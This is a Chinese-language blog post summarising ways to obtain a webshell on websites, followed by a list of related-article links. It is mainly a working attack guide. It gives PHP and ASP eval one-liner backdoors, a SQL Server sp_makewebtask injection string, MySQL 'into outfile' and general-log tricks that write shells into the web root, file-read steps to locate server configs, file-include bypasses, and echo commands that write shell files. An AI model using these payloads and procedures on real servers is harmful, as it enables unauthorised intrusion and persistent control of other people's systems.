getshell方法总结
一、管理员权限拿shell
需要有管理员权限才可以拿shell
通常需要登录后台执行相关操作直接上传拿shell国内多对上传类型进行了限制,需要在进行绕过操作
1、织梦cms后台为例子
进入后台
写入一个一句话木马
长传一个一句话木马
2、数据库备份拿shell
示例:南方数据 v7.0 良精通用企业网站管理系统
方法一:
1.先上一张图马,得到路径2.选择数据库备份,将图马备份为a.asp3.访问xxx/xxx/.../a.asp. 不用管新添的后缀名
方法二:
1、将一句话写入管理员账户名【若输入长度有限制,可以按F12修改】2、创建该管理员用户。这样就将一句话写入数据库3、备份数据库为a.asp文件4、访问。。。
3、突破上传拿shell
本地js验证上传服务器mime上传服务器白名单上传服务器黑名单上传服务器filepath上传双文件上传%00截断上传上传其他脚本类型拿shell
4、修改网站上传类型配置拿shell
有的网站在网站上传类型中限制了上传脚本类型文件,可以添加上传文件类型,如php,jsp,asp等拿shell
5、利用解析漏洞拿shell
IIS 5.x/6.0解析漏洞 目录解析,分号解析,畸形文件名解析IIS 7.0/7.5,Nginx<8.03畸形文件名解析漏洞,php文件解析漏洞Nginx<8.03空字节代码执行漏洞Apache解析漏洞
6、利用编辑器漏洞拿shell
常见的编辑器有fckeditor,ewebeditor,cheditor
7、网站配置插马拿shell
通过找到网站默认配置,将一句话插入到网站配置中,可以事先下载网站源码,查看过滤规则,防止插马失败("%><%eval request(“abc”)%><%’)根据网站源码进行符号匹配。
8、通过编辑模板拿shell
1、通过对网站的模板进行编辑,写入一句话,然后生成脚本文件拿shell2、通过将木马添加到压缩文件,把名字改为网站模板类型,上传到网站服务器,拿shell
9、上传插件拿shell
一些网站为了增加某些功能会在后台添加一些插件来实现,我们可以把木马添加到安装的插件中上传服务器拿shell,常见的有博客类网站dz论坛等
示例:WordPress-V4.2.2搭建时要先创建数据库phpstudy——mysql——create database wpp;插件——已安装的插件——安装插件——下载一个正常的插件,将木马放在里面,一起上传,安装——找上传目录
10、数据库执行拿shell
可通过数据库执行命令导出一句话到网站根目录拿shell,access数据库导出一般需要利用解析漏洞xx.asp;.xml
sqlserve导出:
;exec%20sp_makewebtask%20%20%27c:\zhetpub\wwwroot\ms\x1.asp%27,%27select%27%27<%execute(request(“cmd”))%>%27%27%27
mysql命令导出shell
create TABLE study (cmd text Not NULL);insert INTO study (cmd) VALUES(‘<?php eval($_POST[cmd])?>’);select cmd from study into outfile ‘D:/php/www/htdocs/test/seven.php’;drop TABLE IF EXISTS study;
或
use mysql;create table x (packet text) type=MYISaM;insert into x (packet) values(‘<pre><body><?php @system($_GET[“cmd”]);?></body></pre>’)select x into outfile ‘d:\php\xx.php’
或
select ‘<?php eval($_POST[cmd]);?>’ into outfile ‘c:/inetpub/wwwroot/mysql.php/1.php’
进入phpmyadmin
1、知道网站路径
直接执行SQL语句导入shell
注:有时可能出现不允许直接导shell
解决方法:首页——变量——general lag 编辑——ON——general log file 编辑 D:\phpstudy\www\ba.php——SQL——一句话用引号引起来——执行——报错——生成日志,利用日志记录生成shell
2、不知道路径时——推理路径
首页——变量——mysql的集成环境路径——apache的路径也知道了——D:\phpstudy\Apache\conf\httpd.conf——找个数据库——创建表:
create table a(a text);
开外链
load data infile “D:/phpstudy/Apache/conf/httpd.conf” into table a;
导出SQL搜索documentroot
路径推理
D:/phpstudy/Apache/conf/httpd.conf 配置文件的路径,找网站根目录
Apache
/usr/local/mysql
/usr/local/apache/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
ngnix
/usr/local/nginx/conf/nginx.conf
phpmyadmin一般在网站根目录下
当找不到配置文件时,可以读大文件,由于文件太大会报错,有可能会报出phpmyadmin的路径。
11、文件包含拿shell 多用于上传大马
先将webshell改为txt文件上传,然后上传一个脚本文件包含该txt文件,可绕过waf拿shell
asp包含
1.<!--#include file=”123.jpg”-->2.调用的文件必须和被调用的文件在同一目录,否则找不到3.如果找不到,用下面的语句<--#include virtual=”文件所在目录/123.jpg”-->
php包含
<?php include(“123.jpg”)?>
12、命令执行拿shell
echo ^<^?php @eval($_POST[‘abc’]);?^>^ >c:\1.phpecho ^<^?php @eval($_POST[‘abc’]);?^>^ >c:\1.php^<^%eval request(“abc”)%^>^ >c:\1.php
二、普通用户(前台)拿shell
0day拿shellIIS写权限拿shell命令执行拿shell通过注入漏洞拿shell前台用户头像上传拿shellstrusts2拿shelljava反序列拿shell
或者常见CMS拿shell---------直接百度
getshell方法总结相关推荐
- mysql进行getshell方法
一. into outfile 利用条件 1. 此方法利用的先决条件 web目录具有写权限,能够使用单引号 知道网站绝对路径(根目录,或则是根目录往下的目录都行) secure_file_priv没有 ...
- php Wrapper LFI,PHP安全之LFI漏洞GetShell方法大阅兵
Author:LengF Blog:www.81sec.com 0x00 题外话 关于PHP中LFI(Local File Include,本地文件包含)漏洞很多朋友都不是很熟悉,其实网络上有很多 ...
- phpinfo为关键的getshell方法
漏洞实例,vulhub的文件包含漏洞(利用phpinfo) (162条消息) PHP文件包含漏洞(利用phpinfo)_Li-D的博客-CSDN博客_php文件包含漏洞 (162条消息) PHP文件包 ...
- 渗透测试-getshell方法总结
一.管理员权限拿shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作直接上传拿shell国内多对上传类型进行了限制,需要在进行绕过操作 1.织梦cms后台为例子 进入后台 写入 ...
- 网站后台getshell的方法总结
方法一:直接上传getshell 以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下: 即可成功上传大马,并成功执行,从而拿下webshell. 坑:通常由于权限限制, ...
- 【网络安全】一次实战中对tp5网站getshell方式的测试
前言 之前接触tp5的站比较少,只知道利用RCE漏洞getshell的方式.在最近对一个发卡平台渗透的过程中,由于php版本限制,无法直接使用RCE的payload拿shell,于是结合该网站尽可能多 ...
- php漏洞可以过去root,phpdisk 漏洞发布 phpdisk header bypass getShell exp解析
Author:Yaseng Team:CodePlay 1:代码审计 PHPDISK网盘系统是国内使用广泛PHP和MySQL构建的网络硬盘(文件存储管理)系统,笔者对其源码分析中,发现了一个很有意思的 ...
- 渗透测试-getshell学习总结
getshell学习总结 文章目录 getshell学习总结 一.方法分类 1.带有漏洞的应用 2.常规漏洞 3.后台拿shell 二.网站常见getshell方法 1.数据库备份拿shell 2.上 ...
- getshell思路
getshell能干嘛 文件上传getshell 文件包含getshell sql注入getshell 操作系统漏洞getshell RCE getshell 总结 授人以鱼,不如授人以渔 getsh ...
最新文章
- 中标麒麟mysql导数据_中标麒麟(linux)mysql配置记录
- AE教程:学会这个,你做的Logo就可以单独出道了
- agv matlab应用,简单介绍一下agv调度控制系统常见的软件应用
- mysql设置不主动提交无效_关闭事务自动提交无效,回滚也无效
- hdu5371(O(n)求回文子串的相关问题)
- Exynos4412裸机开发 —— UART
- 前端js获取SpringMvc后台model中传值
- 2021-2025年中国独立式梳妆浴缸行业市场供需与战略研究报告
- python学习网站-关于python学习,最系统的学习网站看这里
- VS Code中powershell无法运行cnpm, vue等命令
- Labview笔记(十)---文件IO (中)---读写 配置文件,XML文件
- 用于HTML5移动开发的10大移动APP开发框架
- 苹果鼠标滚轮驱动_黑苹果仿冒秒控鼠标
- Unity 利用射线实现弹孔效果
- python歌词图表分析_Python可视化图分析毛不易的《入海》,看看听歌的人都在想些什么...
- 手机怎么调整照片分辨率?照片清晰度dpi怎么调整?
- 使用sklearn进行增量学习
- 基于Android的房屋租赁系统
- 中国56个民族脚本数据
- ubunutu个人配置
热门文章
- 【SSM】nested exception is org.apache.ibatis.binding.BindingException: Invalid boun原因总结
- Mybatis奇淫技巧
- Windows server 2003 安装vs2005 sp1补丁包报1718错误的解决方法
- error: call to implicitly-deleted copy constructor of 编译报错分析
- 魅族M8开发初识及一点思考
- Hadoop HDFS完全分布式环境搭建以及技术详解(保证没接触过大数据的小白看完就能独自把集群搭起来,并对HDFS有详细的认知)
- LeetCode-638. 大礼包
- (4)(4.6.8) 电子调速器(ESC)校准
- 随机生成及检测8位密码:必须由大写字母、小写字母、数字和特殊符号共同组成
- 头条、快手,那些我曾经错过的暴富机会 | 程序员有话说